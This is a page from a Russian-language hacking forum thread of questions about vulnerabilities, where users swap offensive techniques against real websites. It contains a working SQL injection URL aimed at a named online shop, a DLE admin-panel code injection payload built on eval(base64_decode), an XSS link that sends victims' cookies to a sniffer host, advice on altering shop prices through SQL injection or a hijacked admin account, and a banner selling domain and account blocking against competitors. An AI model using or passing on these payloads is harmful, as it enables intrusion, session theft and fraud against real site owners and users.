Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 84 из 296

Опции темы

Поиск в этой теме

Опции просмотра

#831

04.11.2015, 13:20

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

С нами: 9721141

Репутация: 1013

Цитата:

Сообщение от GroM88

↑
Ты видимо не читал предыдущие посты, либо не совсем понял в чем проблема.
Ссылка идет вида
http://megasite.ru/member.html?id=54321
При добавлении коментария Если добавлть html код, он отлично врезается в страницу и выполняется, java script тоже выполняется. А вот когда добавляешь php код например то он не выполняется потому что стоит какой то чудо фильтр на
Konqi,
капать там больше некуда) вот добавили этот баговый коментарий к добавлению мембера в ЧС)

это так не работает. даже если внедрить код php, он не будет выполнен. там HTML Injection, а не Code Injection. копать есть куда, я вам предложил - Stored XSS через CSRF

#832

06.11.2015, 22:53

Br@!ns

Постоянный

Регистрация: 03.09.2010

Сообщений: 885

С нами: 8258006

Репутация: 25

Какими способами можно обойти git? нужно поправить скрипт, который не находится в .gitignore? админ постоянно палит. Прощу советов

#833

07.11.2015, 02:57

spherics

Участник форума

Регистрация: 14.01.2008

Сообщений: 174

С нами: 9644530

Репутация: 443

Цитата:

Сообщение от BabaDook

↑

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.matrasmax.ru/konfigurator/?on_page=15&price_active=0&height_active=0&type=&size=131&producer_46=on&producers=&price_from=0&price_to=12000&materials=&stronger1=ТУТ &stronger2=&text=&action=apply_filter[/COLOR][/COLOR]

Инъекция?

Вот иньекция

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.matrasmax.ru/mattress/?other-sizes=421792+order+by+10000--[/COLOR][/COLOR]

#834

07.11.2015, 10:29

sander

Новичок

Регистрация: 14.06.2010

Сообщений: 0

С нами: 8374164

Репутация: 0

Возможно ли сделать себе больше денег или снизить цену на сайте-магазине,имея при этом SQL Inj?

Если да то как ?

#835

07.11.2015, 10:47

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

С нами: 8885780

Репутация: 672

Цитата:

Сообщение от SaNDER

↑
Возможно ли сделать себе больше денег или снизить цену на сайте-магазине,имея при этом SQL Inj?
Если да то как ?

Какие то странные вопросы озвучиваете. Если ваша иньекция дает возможность выполнения UPDATE запросов то можно изменить все что хотите (а точнее то к чему есть доступ).

//но кэп подсказывает что с магазинами играть не стоит

#836

07.11.2015, 10:51

AlexG

Познающий

Регистрация: 26.09.2015

Сообщений: 56

С нами: 5595446

Репутация: 5

Цитата:

Сообщение от SaNDER

↑
Возможно ли сделать себе больше денег или снизить цену на сайте-магазине,имея при этом SQL Inj?
Если да то как ?

Такое впечатлние что вы никогда админку шопа не видели (да и в принципе не понимаете как движки шопов работают). Если нет доступа к UPDATE - админская (манагерская) учетка - в админке делаем все что хотим.

ПыСы И прокатит такое только с цифровыми товарами, и то, далеко не всегда.

#837

07.11.2015, 10:57

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

С нами: 5797046

Репутация: 40

Цитата:

Сообщение от spherics

↑
Вот иньекция

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.matrasmax.ru/mattress/?other-sizes=421792+order+by+10000--[/COLOR][/COLOR]

Спасибо. за ответ.

#838

09.11.2015, 19:58

WallHack

Постоянный

Регистрация: 18.07.2013

Сообщений: 293

С нами: 6747446

Репутация: 32

Нашел 4 LFI не могу эксплуатировать мешает эта СРАНЬ

Можно обойти ?

#839

10.11.2015, 01:25

hpol

Познающий

Регистрация: 11.12.2013

Сообщений: 62

С нами: 6537206

Репутация: 15

Цитата:

Сообщение от palec2006

↑
спалите как в DLE напихать, админ есть

настройки видеоплеера

ширина проигрывателя aaa\

длина проигрывателя .eval(base64_decode(тут код)),//

в ширине экранируем кавычку в длине в конце коментируем

#840

10.11.2015, 20:08

Hussar

Новичок

Регистрация: 10.11.2015

Сообщений: 4

С нами: 5530646

Репутация: 0

Эксплуатирую XSS и тут появился такой вопрос. Отправляю ссылку жертве с этим кодом

document.location.replace(%27http://доменснифера.ком/sniff.php?с=doсument.сookie%27) и в логах появляется это - %C3%B1=do%C3%B1ument.%C3%B1ookie

Все делаю как надо, а куки левые приходят, вставлял их в браузер и не получилось зайти от админа. Подскажите, в чем загвоздка?

Страница 84 из 296

Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход